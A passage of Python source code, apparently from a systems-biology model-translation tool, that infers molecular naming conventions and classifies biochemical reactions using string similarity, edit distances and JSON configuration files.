equivalenceTranslator[element].append(localEquivalenceTranslator[element])
for instance in localEquivalenceTranslator[element]:
addToDependencyGraph(dependencyGraph,instance[1],[instance[0]])
else:
return [],[]
elif flag:
return [],[]
basicElements.append(min(closestList,key=len))
#if what i have is a known compound just add it
if splitp in species:
composingElements.append(splitp)
#if not create it
else:
closestList = get_close_matches(splitp,species)
closestList = [x for x in closestList if len(x) < len(splitp)]
flag = False
for element in closestList:
localEquivalenceTranslator,_,_ = self.processNamingConventions2([element,splitp])
if len(localEquivalenceTranslator.keys()) == 0:
basicElements = []
composingElements = []
for element in localEquivalenceTranslator:
if element not in equivalenceTranslator:
equivalenceTranslator[element] = []
equivalenceTranslator[element].append(localEquivalenceTranslator[element])
for instance in localEquivalenceTranslator[element]:
addToDependencyGraph(dependencyGraph,instance[1],[instance[0]])
flag = True
if flag:
composingElements.append(splitp)
return basicElements,composingElements
additionalHandling = []
#lexical handling
for particle in sorted(particles, key=len):
composingElements = []
basicElements = []
# can you break it down into small bites?
if '_' in particle:
splitparticle = particle.split('_')
#print '---',splitparticle
splitparticle = [x for x in splitparticle if x]
#print splitparticle
basicElements,composingElements = analyzeByParticle(splitparticle,species)
if basicElements == composingElements and basicElements:
closeMatches = get_close_matches(particle,species)
matches = [x for x in closeMatches if len(x) < len(particle) and len(x) >= 3]
for match in matches:
difference = difflib.ndiff(match,particle)
differenceList = tuple([x for x in difference if '+' in x])
if differenceList in self.namingConventions['patterns']:
logMess('INFO:LAE005', 'matching {0}={1}'.format(particle, [match]))
addToDependencyGraph(dependencyGraph,particle,[match])
if len(matches) > 0:
continue
elif particle not in composingElements and composingElements != [] and all([x in species for x in composingElements]):
addToDependencyGraph(dependencyGraph, particle, composingElements)
for element in composingElements:
if element not in dependencyGraph:
addToDependencyGraph(dependencyGraph, element, [])
if element not in particles:
additionalHandling.append(element)
continue
else:
for basicElement in basicElements:
if basicElement in particle and basicElement != particle:
fuzzyList = self.processAdHocNamingConventions(basicElement, particle, localSpeciesDict, False, species)
if self.testAgainstExistingConventions(fuzzyList[0][1], self.namingConventions['modificationList']):
addToDependencyGraph(dependencyGraph, particle, [basicElement])
logMess('INFO:LAE005', '{0} can be mapped to {1} through existing naming conventions'.format(particle, [basicElement]))
break
continue
# if bottom up doesn't work try a top down approach
for comparisonParticle in particles:
if particle == comparisonParticle:
continue
# try to map remaining orphaned molecules to each other based on simple, but known modifications
if comparisonParticle in particle:
fuzzyList = self.processAdHocNamingConventions(particle,comparisonParticle,localSpeciesDict, False, species)
if self.testAgainstExistingConventions(fuzzyList[0][1],self.namingConventions['modificationList']):
if particle in annotationDict and comparisonParticle in annotationDict:
baseSet = set([y for x in annotationDict[particle] for y in annotationDict[particle][x]])
modSet = set([y for x in annotationDict[comparisonParticle] for y in annotationDict[comparisonParticle][x]])
if len(baseSet.intersection(modSet)) == 0:
baseDB = set([x.split('/')[-2] for x in baseSet if 'identifiers.org' in x])
modDB = set([x.split('/')[-2] for x in modSet if 'identifiers.org' in x])
                                # we still have to check that they both reference the same database
if len(baseDB.intersection(modDB)) > 0:
logMess('ERROR:ANN202', '{0}:{1}:can be mapped through naming conventions but the annotation information does not match'.format(particle, comparisonParticle))
continue
addToDependencyGraph(dependencyGraph,particle,[comparisonParticle])
logMess('INFO:LAE005', '{0} can be mapped to {1} through existing naming conventions'.format(particle, [comparisonParticle]))
break
else:
common_root = detectOntology.findLongestSubstring(particle, comparisonParticle)
                    # some arbitrary threshold of what makes a good minimum length for the common root
if len(common_root) > 0 and common_root not in originalDependencyGraph:
fuzzyList = self.processAdHocNamingConventions(common_root,comparisonParticle,localSpeciesDict, False, species)
fuzzyList2 = self.processAdHocNamingConventions(common_root,particle,localSpeciesDict, False, species)
particleMap = self.testAgainstExistingConventions(fuzzyList[0][1], self.namingConventions['modificationList'])
                        compParticleMap = self.testAgainstExistingConventions(fuzzyList2[0][1], self.namingConventions['modificationList'])
if particleMap and compParticleMap:
if particle in annotationDict and comparisonParticle in annotationDict:
baseSet = set([y for x in annotationDict[particle] for y in annotationDict[particle][x]])
modSet = set([y for x in annotationDict[comparisonParticle] for y in annotationDict[comparisonParticle][x]])
if len(baseSet.intersection(modSet)) == 0:
logMess('ERROR:ANN202', '{0}:{1}:can be mapped through naming conventions but the annotation information does not match'.format(particle,comparisonParticle))
break
addToDependencyGraph(dependencyGraph, particle, [common_root])
addToDependencyGraph(dependencyGraph, comparisonParticle, [common_root])
addToDependencyGraph(dependencyGraph, common_root, [])
logMess('INFO:LAE006', '{0}:{1}:can be mapped together through new common molecule {2} by existing naming conventions'.format(particle, comparisonParticle, common_root))
break
#if len(additionalHandling) > 0:
#print self.findClosestModification(set(additionalHandling),species)
return dependencyGraph,equivalenceTranslator
def loadConfigFiles(self,fileName):
'''
        The reactionDefinition file must contain the definitions of the basic reaction
        types we want to parse and the requirements for a given reaction to be
        classified as such.
'''
reactionDefinition = ''
if fileName == '':
return []
with open(fileName,'r') as fp:
reactionDefinition = json.load(fp)
return reactionDefinition
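    # Hedged sketch (added): the layout below is inferred from the keys this
    # class reads elsewhere in this file, not from an authoritative schema.
    # A reactionDefinitions.json file is expected to look roughly like:
    # {
    #     "reactions": [[["S0"], ["S1"]], [["S0", "S1"], ["S2"]], ...],
    #     "definitions": [[{"r": [0]}], [{"n": 1, "rsi": 0, "rst": 0}], ...],
    #     "reactionsNames": ["Binding", ...],
    #     "reactionSite": [...],
    #     "reactionState": [...]
    # }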
def identifyReactions2(self,rule,reactionDefinition):
'''
This method goes through the list of common reactions listed in ruleDictionary
        and tries to find how they are related according to the information in reactionDefinition
'''
result = []
for idx,element in enumerate(reactionDefinition['reactions']):
tmp1 = rule[0] if rule[0] not in ['0',['0']] else []
tmp2 = rule[1] if rule[1] not in ['0',['0']] else []
if(len(tmp1) == len(element[0]) and len(tmp2) == len(element[1])):
result.append(1)
# for (el1,el2) in (element[0],rule[0]):
# if element[0].count(el1) == element[]
else:
result.append(0)
return result
def species2Rules(self,rules):
'''
This method goes through the rule list and classifies species tuples in a dictionary
according to the reactions they appear in.
'''
ruleDictionary = {}
for idx,rule in enumerate(rules):
reaction2 = rule #list(parseReactions(rule))
totalElements = [item for sublist in reaction2 for item in sublist]
if tuple(totalElements) in ruleDictionary:
ruleDictionary[tuple(totalElements)].append(idx)
else:
ruleDictionary[tuple(totalElements)] = [idx]
return ruleDictionary
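    # Hedged worked example (added, with made-up inputs): with rules such as
    #   [[['A'], ['A_P']], [['A'], ['A_P']], [['B'], ['C']]]
    # the flattened element tuples are ('A', 'A_P'), ('A', 'A_P') and
    # ('B', 'C'), so the method returns
    #   {('A', 'A_P'): [0, 1], ('B', 'C'): [2]}
    # grouping the indices of reactions that involve the same species tuple.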
def checkCompliance(self,ruleCompliance,tupleCompliance,ruleBook):
'''
        This method is mainly useful when a single reaction could possibly be
        classified in different ways, but in the context of its tuple partners
        it can only be classified as one.
'''
ruleResult = np.zeros(len(ruleBook))
for validTupleIndex in np.nonzero(tupleCompliance):
for index in validTupleIndex:
for alternative in ruleBook[index]:
if 'r' in alternative and np.any([ruleCompliance[temp] for temp in alternative['r']]):
ruleResult[index] = 1
break
#check if just this is enough
if 'n' in alternative:
ruleResult[index] = 1
break
return ruleResult
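    # Hedged worked example (added, with made-up inputs): given
    #   ruleBook = [[{'r': [0]}], [{'n': 1}]]
    #   ruleCompliance = [1, 0]
    #   tupleCompliance = [1, 1]
    # both tuple entries are nonzero; the first definition is satisfied
    # through its 'r' condition (ruleCompliance[0] is truthy) and the second
    # through its 'n' condition, so the method returns array([1., 1.]).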
def levenshtein(self,s1, s2):
l1 = len(s1)
l2 = len(s2)
matrix = [range(l1 + 1)] * (l2 + 1)
for zz in range(l2 + 1):
matrix[zz] = range(zz,zz + l1 + 1)
for zz in range(0,l2):
for sz in range(0,l1):
if s1[sz] == s2[zz]:
matrix[zz+1][sz+1] = min(matrix[zz+1][sz] + 1, matrix[zz][sz+1] + 1, matrix[zz][sz])
else:
matrix[zz+1][sz+1] = min(matrix[zz+1][sz] + 1, matrix[zz][sz+1] + 1, matrix[zz][sz] + 1)
return matrix[l2][l1]
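    # Hedged illustration (added): with this classic dynamic-programming
    # distance, one insertion or one substitution costs 1, e.g.
    #   levenshtein('EGF', 'EGFR')        -> 1  (one trailing insertion)
    #   levenshtein('Ras_GDP', 'Ras_GTP') -> 1  (one substitution, D -> T)
    # and identical strings score 0.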
def analyzeUserDefinedEquivalences(self,molecules,conventions):
equivalences = {}
smolecules = [x.strip('()') for x in molecules]
modifiedElement = {}
for convention in conventions:
baseMol = []
modMol = []
for molecule in smolecules:
if convention[0] in molecule and convention[1] not in molecule:
baseMol.append(molecule)
elif convention[1] in molecule:
modMol.append(molecule)
if convention[2] not in equivalences:
equivalences[convention[2]] = []
equivalences[convention[2]].append((convention[0],convention[1]))
if convention[0] not in modifiedElement:
modifiedElement[convention[0]] = []
modifiedElement[convention[0]].append((convention[0],convention[1]))
'''
for mol1 in baseMol:
for mol2 in modMol:
score = self.levenshtein(mol1,mol2)
if score == self.levenshtein(convention[0],convention[1]):
equivalences[convention[2]].append((mol1,mol2))
modifiedElement[convention[0]].append((mol1,mol2))
break
'''
return equivalences,modifiedElement
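    # Hedged worked example (added, with made-up inputs): for
    #   molecules   = ['A()', 'A_P()']
    #   conventions = [['A', 'A_P', 'Phosphorylation']]
    # 'A' matches the base pattern and 'A_P' the modified one, so the method
    # returns
    #   equivalences    = {'Phosphorylation': [('A', 'A_P')]}
    #   modifiedElement = {'A': [('A', 'A_P')]}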
def processNamingConventions2(self, molecules, threshold=4, onlyUser=False):
# normal naming conventions
strippedMolecules = [x.strip('()') for x in molecules]
tmpTranslator = {}
translationKeys = []
conventionDict = {}
# FIXME: This line contains the single biggest execution bottleneck in the code
# we should be able to delete it
# user defined equivalence
if not onlyUser:
tmpTranslator, translationKeys, conventionDict = detectOntology.analyzeNamingConventions(strippedMolecules,
self.namingConventions, similarityThreshold=threshold)
# user defined naming convention
if self.userEquivalencesDict is None and hasattr(self, 'userEquivalences'):
self.userEquivalencesDict, self.modifiedElementDictionary = self.analyzeUserDefinedEquivalences(molecules, self.userEquivalences)
else:
if self.userEquivalencesDict is None:
self.userEquivalencesDict = {}
'''
for name in self.userEquivalencesDict:
equivalenceTranslator[name] = self.userEquivalencesDict[name]
'''
# add stuff to the main translator
for element in self.userEquivalencesDict:
if element not in tmpTranslator:
tmpTranslator[element] = []
tmpTranslator[element].extend(self.userEquivalencesDict[element])
return tmpTranslator, translationKeys, conventionDict
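    # Hedged sketch (added): judging from the doctests elsewhere in this
    # file, for molecules such as ['A', 'A_p'] and a standard phosphorylation
    # convention, the returned translator maps a modification name to the
    # species pairs it relates (e.g. {'Phosphorylation': [('A', 'A_p')]}),
    # translationKeys holds the lexical tags (e.g. ['_p']) and conventionDict
    # maps ndiff patterns such as ('+ _', '+ p') back to the modification
    # name. Exact contents depend on detectOntology.analyzeNamingConventions
    # and the loaded config files.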
def processAdHocNamingConventions(self, reactant, product,
localSpeciesDict, compartmentChangeFlag, moleculeSet):
'''
1-1 string comparison. This method will attempt to detect if there's
        a modification relationship between string <reactant> and <product>
>>> sa = SBMLAnalyzer(None,'./config/reactionDefinitions.json','./config/namingConventions.json')
>>> sa.processAdHocNamingConventions('EGF_EGFR_2','EGF_EGFR_2_P', {}, False, ['EGF','EGFR', 'EGF_EGFR_2'])
[[[['EGF_EGFR_2'], ['EGF_EGFR_2_P']], '_p', ('+ _', '+ p')]]
        >>> sa.processAdHocNamingConventions('A', 'A_P', {}, False,['A','A_P'])  # changes need to be at least 3 characters long
[[[['A'], ['A_P']], None, None]]
>>> sa.processAdHocNamingConventions('Ras_GDP', 'Ras_GTP', {}, False,['Ras_GDP','Ras_GTP', 'Ras'])
[[[['Ras'], ['Ras_GDP']], '_gdp', ('+ _', '+ g', '+ d', '+ p')], [[['Ras'], ['Ras_GTP']], '_gtp', ('+ _', '+ g', '+ t', '+ p')]]
>>> sa.processAdHocNamingConventions('cRas_GDP', 'cRas_GTP', {}, False,['cRas_GDP','cRas_GTP'])
[[[['cRas'], ['cRas_GDP']], '_gdp', ('+ _', '+ g', '+ d', '+ p')], [[['cRas'], ['cRas_GTP']], '_gtp', ('+ _', '+ g', '+ t', '+ p')]]
'''
#strippedMolecules = [x.strip('()') for x in molecules]
molecules = [reactant, product] if len(reactant) < len(product) else [product, reactant]
similarityThreshold = 10
if reactant == product:
return [[[[reactant], [product]], None, None]]
namePairs, differenceList, _ = detectOntology.defineEditDistanceMatrix(molecules, similarityThreshold=similarityThreshold)
#print '+++',namePairs,differenceList
#print '---',detectOntology.defineEditDistanceMatrix2(molecules,similarityThreshold=similarityThreshold)
        # FIXME: we need a smarter heuristic here to detect actual modifications.
        # For now we go with a simple one: the species name must be long enough,
        # and the changes from a to b must all be about modification.
longEnough = 3
if len(differenceList) > 0 and ((len(reactant) >= longEnough and len(reactant) >= len(differenceList[0])) or reactant in moleculeSet):
# one is strictly a subset of the other a,a_b
if len([x for x in differenceList[0] if '-' in x]) == 0:
return [[[[reactant], [product]], ''.join([x[-1] for x in differenceList[0]]), differenceList[0]]]
            # strings share a common subset but contain mutually exclusive suffixes: a_b, a_c
else:
commonRoot = detectOntology.findLongestSubstring(reactant, product)
if len(commonRoot) > longEnough or commonRoot in moleculeSet:
#find if we can find a commonRoot from existing molecules
mostSimilarRealMolecules = get_close_matches(commonRoot, [x for x in moleculeSet if x not in [reactant, product]])
for commonMolecule in mostSimilarRealMolecules:
if commonMolecule in reactant and commonMolecule in product:
commonRoot = commonMolecule
logMess('DEBUG:LAE003', 'common root {0}={1}:{2}'.format(commonRoot, reactant, product))
#if commonMolecule == commonRoot.strip('_'):
# commonRoot= commonMolecule
# break
molecules = [commonRoot, reactant, product]
namePairs, differenceList, _ = detectOntology.defineEditDistanceMatrix([commonRoot, reactant], similarityThreshold=10)
namePairs2, differenceList2, _ = detectOntology.defineEditDistanceMatrix([commonRoot, product], similarityThreshold=10)
namePairs.extend(namePairs2)
#print namePairs, reactant, product
#XXX: this was just turning the heuristic off
#for element in namePairs:
                    # supposed modification is actually a pre-existing species; if that happens then refuse to proceed
# if element[1] in moleculeSet:
# return [[[[reactant],[product]],None,None]]
differenceList.extend(differenceList2)
# obtain the name of the component from an anagram using the modification letters
validDifferences = [''.join([x[-1]
for x in difference])
for difference in differenceList if '-' not in [y[0]
for y in difference]]
validDifferences.sort()
# avoid trivial differences
if len(validDifferences) < 2 or any([x in moleculeSet for x in validDifferences]):
return [[[[reactant],[product]],None,None]]
# FIXME:here it'd be helpful to come up with a better heuristic
                    # for inferred component names
# componentName = ''.join([x[0:max(1,int(math.ceil(len(x)/2.0)))] for x in validDifferences])
#for namePair,difference in zip(namePairs,differenceList):
# if len([x for x in difference if '-' in x]) == 0:
# tag = ''.join([x[-1] for x in difference])
# if [namePair[0],tag] not in localSpeciesDict[commonRoot][componentName]:
# localSpeciesDict[namePair[0]][componentName].append([namePair[0],tag,compartmentChangeFlag])
# localSpeciesDict[namePair[1]][componentName].append([namePair[0],tag,compartmentChangeFlag])
#namePairs,differenceList,_ = detectOntology.defineEditDistanceMatrix([commonRoot,product],
# similarityThreshold=similarityThreshold)
return [[[[namePairs[y][0]],[namePairs[y][1]]],''.join([x[-1] for x in differenceList[y]]),differenceList[y]] for y in range(len(differenceList))]
return [[[[reactant],[product]],None,None]]
def compareStrings(self,reactant,product,strippedMolecules):
if reactant in strippedMolecules:
if reactant in product:
return reactant,[reactant]
#pairedMolecules.append((reactant[idx],reactant[idx]))
#product.remove(reactant[idx])
#reactant.remove(reactant[idx])
else:
closeMatch = get_close_matches(reactant,product)
if len(closeMatch) == 1:
#pairedMolecules.append((reactant[idx],closeMatch[0]))
#product.remove(closeMatch[0])
#reactant.remove(reactant[idx])
return (reactant,closeMatch)
elif len(closeMatch) > 0:
s = difflib.SequenceMatcher()
s.set_seq1(reactant)
scoreDictionary = []
for match in closeMatch:
s.set_seq2(match)
scoreDictionary.append((s.ratio(),match))
scoreDictionary.sort(reverse=True)
return reactant,[closeMatch[0]]
else:
return None,[]
else:
if reactant not in product:
closeMatch = get_close_matches(reactant,product)
if len(closeMatch) == 1:
if closeMatch[0] in strippedMolecules:
return reactant,closeMatch
else:
closeMatchToBaseMolecules = get_close_matches(closeMatch[0],strippedMolecules)
if len(closeMatchToBaseMolecules) == 1:
return reactant,closeMatch
return None,closeMatch
#pairedMolecules.append((reactant[idx],closeMatch[0]))
#product.remove(closeMatch[0])
#reactant.remove(reactant[idx])
else:
return None,closeMatch
#print '****',reactant[idx],closeMatch,difflib.get_close_matches(reactant[idx],strippedMolecules)
else:
mcloseMatch = get_close_matches(reactant,strippedMolecules)
#for close in mcloseMatch:
# if close in [x for x in reaction[0]]:
# return None,[close]
return None,[reactant]
def growString(self, reactant, product, rp, pp, idx, strippedMolecules,continuityFlag):
'''
currently this is the slowest method in the system because of all those calls to difflib
'''
idx2 = 2
treactant = [rp]
tproduct = pp
pidx = product.index(pp[0])
#print reactant,rself.breakByActionableUnit([reactant,product],strippedMolecules)
while idx + idx2 <= len(reactant):
treactant2 = reactant[idx:min(len(reactant), idx + idx2)]
#if treactant2 != tproduct2:
if treactant2[-1] in strippedMolecules and continuityFlag:
break
else:
if len(reactant) > idx + idx2:
tailDifferences = get_close_matches(treactant2[-1], strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(treactant2), x) for x in tailDifferences])
hdr = max([0] + [sequenceMatcher('_'.join(reactant[idx + idx2 - 1:idx + idx2 + 1]), x) for x in tailDifferences])
if tdr > hdr and tdr > 0.8:
treactant = treactant2
else:
tailDifferences = get_close_matches('_'.join(treactant2), strippedMolecules)
headDifferences = get_close_matches('_'.join(reactant[idx + idx2 - 1:idx + idx2 + 1]), strippedMolecules)
if len(tailDifferences) == 0:
break
elif len(headDifferences) == 0:
treactant = treactant2
break
elif len(reactant) == idx + idx2:
tailDifferences = get_close_matches('_'.join(treactant2), strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(treactant2), x) for x in tailDifferences])
if tdr > 0.8:
treactant = treactant2
else:
break
else:
break
else:
treactant = treactant2
break
idx2 += 1
idx2 = 2
while pidx + idx2 <= len(product):
tproduct2 = product[pidx:min(len(product), pidx + idx2)]
if tproduct2[-1] in strippedMolecules and continuityFlag:
break
else:
if len(product) > pidx + idx2:
tailDifferences = get_close_matches(tproduct2[-1], strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(tproduct2), x) for x in tailDifferences])
hdr = max([0] + [sequenceMatcher('_'.join(product[pidx + idx2 - 1:pidx + idx2 + 1]), x) for x in tailDifferences])
if tdr > hdr and tdr > 0.8:
tproduct = tproduct2
else:
tailDifferences = get_close_matches('_'.join(tproduct2), strippedMolecules, cutoff=0.8)
headDifferences = get_close_matches('_'.join(product[pidx + idx2 - 1:pidx + idx2 + 1]), strippedMolecules, cutoff=0.8)
if len(tailDifferences) == 0:
break
elif len(headDifferences) == 0 or '_'.join(tproduct2) in tailDifferences:
tproduct = tproduct2
elif len(product) == pidx + idx2:
tailDifferences = get_close_matches('_'.join(tproduct2), strippedMolecules)
if len(tailDifferences) > 0:
tdr = max([0] + [sequenceMatcher('_'.join(tproduct2), x) for x in tailDifferences])
if tdr > 0.8:
tproduct = tproduct2
else:
break
else:
break
else:
tproduct = tproduct2
break
#if '_'.join(tproduct2) in strippedMolecules and '_'.join(treactant2) in strippedMolecules:
# tproduct = tproduct2
# treactant = treactant2
#else:
idx2 += 1
return treactant, tproduct
def approximateMatching2(self, reactantString, productString, strippedMolecules, differenceParameter):
"""
        The meat of the naming convention matching between reactant and product is done here.
        tl;dr: naming conventions are hard
"""
#reactantString = [x.split('_') for x in reaction[0]]
#reactantString = [[y for y in x if y!=''] for x in reactantString]
#productString = [x.split('_') for x in reaction[1]]
#productString = [[y for y in x if y!=''] for x in productString]
pairedMolecules = [[] for _ in range(len(productString))]
pairedMolecules2 = [[] for _ in range(len(reactantString))]
for stoch, reactant in enumerate(reactantString):
idx = -1
while idx + 1 < len(reactant):
idx += 1
for stoch2, product in enumerate(productString):
#print idx2,product in enumerate(element3):
rp, pp = self.compareStrings(reactant[idx], product, strippedMolecules)
if rp and rp != pp[0]:
pairedMolecules[stoch2].append((rp, pp[0]))
pairedMolecules2[stoch].append((pp[0], rp))
product.remove(pp[0])
reactant.remove(rp)
#product.remove(pp)
#reactant.remove(rp)
idx = -1
break
elif rp:
treactant, tproduct = self.growString(reactant, product,
rp, pp, idx, strippedMolecules,continuityFlag=True)
if '_'.join(treactant) in strippedMolecules:
finalReactant = '_'.join(treactant)
else:
reactantMatches = get_close_matches('_'.join(treactant), strippedMolecules)
if len(reactantMatches) > 0:
reactantScore = [sequenceMatcher(''.join(treactant), x.replace('_','')) for x in reactantMatches]
finalReactant = reactantMatches[reactantScore.index(max(reactantScore))]
else:
finalReactant = '_'.join(treactant)
if '_'.join(tproduct) in strippedMolecules:
finalProduct = '_'.join(tproduct)
else:
productMatches = get_close_matches('_'.join(tproduct), strippedMolecules)
if len(productMatches) > 0:
productScore = [sequenceMatcher(''.join(tproduct), x.replace('_', '')) for x in productMatches]
finalProduct = productMatches[productScore.index(max(productScore))]
else:
finalProduct = '_'.join(tproduct)
pairedMolecules[stoch2].append((finalReactant, finalProduct))
pairedMolecules2[stoch].append((finalProduct, finalReactant))
for x in treactant:
reactant.remove(x)
for x in tproduct:
product.remove(x)
idx = -1
break
else:
flag = False
if pp not in [[], None]:
#if reactant[idx] == pp[0]:
treactant, tproduct = self.growString(reactant, product,
reactant[idx], pp, idx, strippedMolecules,continuityFlag=False)
                            # FIXME: this comparison is pretty nonsensical. treactant and tproduct are not
                            # guaranteed to be in the right order. why are we comparing them both at the same time?
if (len(treactant) > 1 and '_'.join(treactant) in strippedMolecules) or (len(tproduct)>1 and '_'.join(tproduct) in strippedMolecules):
pairedMolecules[stoch2].append(('_'.join(treactant), '_'.join(tproduct)))
pairedMolecules2[stoch].append(('_'.join(tproduct), '_'.join(treactant)))
for x in treactant:
reactant.remove(x)
for x in tproduct:
product.remove(x)
idx = -1
break
else:
rclose = get_close_matches('_'.join(treactant),strippedMolecules)
pclose = get_close_matches('_'.join(tproduct),strippedMolecules)
rclose2 = [x.split('_') for x in rclose]
rclose2 = ['_'.join([y for y in x if y != '']) for x in rclose2]
pclose2 = [x.split('_') for x in pclose]
pclose2 = ['_'.join([y for y in x if y != '']) for x in pclose2]
trueReactant = None
trueProduct = None
try:
trueReactant = rclose[rclose2.index('_'.join(treactant))]
trueProduct = pclose[pclose2.index('_'.join(tproduct))]
except:
pass
if trueReactant and trueProduct:
pairedMolecules[stoch2].append((trueReactant,trueProduct))
pairedMolecules2[stoch].append((trueProduct,trueReactant))
for x in treactant:
reactant.remove(x)
for x in tproduct:
product.remove(x)
idx = -1
break
if sum(len(x) for x in reactantString+productString)> 0 and self.conservationOfMass:
return None,None
else:
return pairedMolecules,pairedMolecules2
def approximateMatching(self,ruleList,differenceParameter=[]):
def curateString(element,differences,symbolList = ['#','&',';','@','!','?'],equivalenceDict={}):
'''
            remove compound differences (> 2 characters) and instead represent them with symbols;
            returns the transformed string, an equivalence dictionary and the unused symbols
'''
tmp = element
for difference in differences:
if difference in element:
if difference.startswith('_'):
if difference not in equivalenceDict:
symbol = symbolList.pop()
equivalenceDict[difference] = symbol
else:
symbol = equivalenceDict[difference]
tmp = re.sub(r'{0}(_|$)'.format(difference),r'{0}\1'.format(symbol),tmp)
elif difference.endswith('_'):
if difference not in equivalenceDict:
symbol = symbolList.pop()
equivalenceDict[difference] = symbol
else:
symbol = equivalenceDict[difference]
tmp = re.sub(r'(_|^){0}'.format(difference),r'{0}\1'.format(symbol),tmp)
return tmp,symbolList,equivalenceDict
'''
given a transformation of the kind a+ b -> ~a_~b, where ~a and ~b are some
slightly modified version of a and b, this function will return a list of
lexical changes that a and b must undergo to become ~a and ~b.
'''
flag = True
if len(ruleList[1]) == 1 and ruleList[1] != '0':
differences = deepcopy(differenceParameter)
tmpRuleList = deepcopy(ruleList)
while flag:
flag = False
sym = ['#','&',';','@','!','?']
dic = {}
for idx,_ in enumerate(tmpRuleList[0]):
tmpRuleList[0][idx],sym,dic = curateString(ruleList[0][idx],differences,sym,dic)
tmpRuleList[1][0],sym,dic = curateString(ruleList[1][0],differences,sym,dic)
permutations = [x for x in itertools.permutations(ruleList[0])]
tpermutations = [x for x in itertools.permutations(tmpRuleList[0])]
score = [difflib.SequenceMatcher(None,'_'.join(x),ruleList[1][0]).ratio() \
for x in permutations]
maxindex = score.index(max(score))
ruleList[0] = list(permutations[maxindex])
tmpRuleList[0] = list(tpermutations[maxindex])
sym = [dic[x] for x in dic]
sym.extend(differences)
sym = [x for x in sym if '_' not in x]
simplifiedDifference = difflib.SequenceMatcher(lambda x: x in sym,'-'.join(tmpRuleList[0]),tmpRuleList[1][0])
matches = simplifiedDifference.get_matching_blocks()
if len(matches) != len(ruleList[0]) + 1:
return [[],[]],[[],[]]
productPartitions = []
for idx,match in enumerate(matches):
if matches[idx][2] != 0:
productPartitions.append(tmpRuleList[1][0][
matches[idx][1]:matches[idx][1]+matches[idx][2]])
reactantPartitions = tmpRuleList[0]
#Don't count trailing underscores as part of the species name
for idx,_ in enumerate(reactantPartitions):
reactantPartitions[idx] = reactantPartitions[idx].strip('_')
for idx,_ in enumerate(productPartitions):
productPartitions[idx] = productPartitions[idx].strip('_')
        # greedy matching
acc=0
        # FIXME: it's not properly copying the whole string
for idx in range(0,len(matches)-1):
while matches[idx][2]+ acc < len(tmpRuleList[1][0]) \
and tmpRuleList[1][0][matches[idx][2]+ acc] in sym:
productPartitions[idx] += tmpRuleList[1][0][matches[idx][2] + acc]
acc += 1
#idx = 0
#while(tmpString[matches[0][2]+ idx] in sym):
# reactantfirstHalf += tmpString[matches[0][2] + idx]
# idx += 1
for element in dic:
for idx in range(len(productPartitions)):
productPartitions[idx] = productPartitions[idx].replace(dic[element],element)
reactantPartitions[idx] = reactantPartitions[idx].replace(dic[element],element)
zippedPartitions = zip(reactantPartitions,productPartitions)
zippedPartitions = [sorted(x,key=len) for x in zippedPartitions]
bdifferences = [[z for z in y if '+ ' in z or '- ' in z] for y in \
[difflib.ndiff(*x) for x in zippedPartitions]]
processedDifferences = [''.join([y.strip('+ ') for y in x]) for x in bdifferences]
for idx,processedDifference in enumerate(processedDifferences):
if processedDifference not in differences and \
'- ' not in processedDifference and bdifferences[idx] != []:
flag = True
differences.append(processedDifference)
else:
            # TODO: deal with reactions of the kind a + b -> c + d
return [[],[]],[[],[]]
return bdifferences,zippedPartitions
def getReactionClassification(self,reactionDefinition,rules,equivalenceTranslator,
indirectEquivalenceTranslator,
translationKeys=[]):
'''
*reactionDefinition* is a list of conditions that must be met for a reaction
to be classified a certain way
*rules* is the list of reactions
        *equivalenceTranslator* is a dictionary containing all complexes that have been
determined to be the same through naming conventions
This method will go through the list of rules and the list of rule definitions
and tell us which rules it can classify according to the rule definitions list
provided
'''
ruleDictionary = self.species2Rules(rules)
        # determines a reaction's reactionStructure, a.k.a. its stoichiometry
ruleComplianceMatrix = np.zeros((len(rules),len(reactionDefinition['reactions'])))
for (idx,rule) in enumerate(rules):
reaction2 = rule #list(parseReactions(rule))
ruleComplianceMatrix[idx] = self.identifyReactions2(reaction2,reactionDefinition)
#initialize the tupleComplianceMatrix array with the same keys as ruleDictionary
#the tuple complianceMatrix is basically there to make sure we evaluate
#bidirectional reactions as one reaction
tupleComplianceMatrix = {key:np.zeros((len(reactionDefinition['reactions']))) for key in ruleDictionary}
#check which reaction conditions each tuple satisfies
for element in ruleDictionary:
for rule in ruleDictionary[element]:
tupleComplianceMatrix[element] += ruleComplianceMatrix[rule]
#now we will check for the nameConventionMatrix (same thing as before but for naming conventions)
tupleNameComplianceMatrix = {key:{key2:0 for key2 in equivalenceTranslator} \
for key in ruleDictionary}
for rule in ruleDictionary:
for namingConvention in equivalenceTranslator:
for equivalence in equivalenceTranslator[namingConvention]:
if all(element in rule for element in equivalence):
tupleNameComplianceMatrix[rule][namingConvention] +=1
break
for equivalence in indirectEquivalenceTranslator[namingConvention]:
if all(element in rule for element in equivalence[0]):
tupleNameComplianceMatrix[rule][namingConvention] +=1
break
#we can have more than one
#check if the reaction conditions each tuple satisfies are enough to get classified
        # as a specific named reaction type
tupleDefinitionMatrix = {key:np.zeros((len(reactionDefinition['definitions']))) for key in ruleDictionary}
for key,element in tupleComplianceMatrix.items():
for idx,member in enumerate(reactionDefinition['definitions']):
for alternative in member:
if 'r' in alternative:
tupleDefinitionMatrix[key][idx] += np.all([element[reaction] for reaction in alternative[u'r']])
if 'n' in alternative and reactionDefinition['reactionsNames'][idx] in equivalenceTranslator:
tupleDefinitionMatrix[key][idx] += np.all([tupleNameComplianceMatrix[key][reactionDefinition['reactionsNames'][idx]]])
        # contains which rules are equal to reactions defined in reactionDefinition['definitions']
#use the per tuple classification to obtain a per reaction classification
ruleDefinitionMatrix = np.zeros((len(rules),len(reactionDefinition['definitions'])))
for key,element in ruleDictionary.items():
for rule in element:
ruleDefinitionMatrix[rule] = self.checkCompliance(ruleComplianceMatrix[rule],
tupleDefinitionMatrix[key],reactionDefinition['definitions'])
#use reactionDefinitions reactionNames field to actually tell us what reaction
#type each reaction is
results = []
for idx,element in enumerate(ruleDefinitionMatrix):
nonZero = np.nonzero(element)[0]
if(len(nonZero) == 0):
results.append('None')
#todo: need to do something if it matches more than one reaction
else:
classifications = [reactionDefinition['reactionsNames'][x] for x in nonZero]
#FIXME: we should be able to support more than one transformation
results.append(classifications[0])
return results
def setConfigurationFile(self,configurationFile):
self.configurationFile = configurationFile
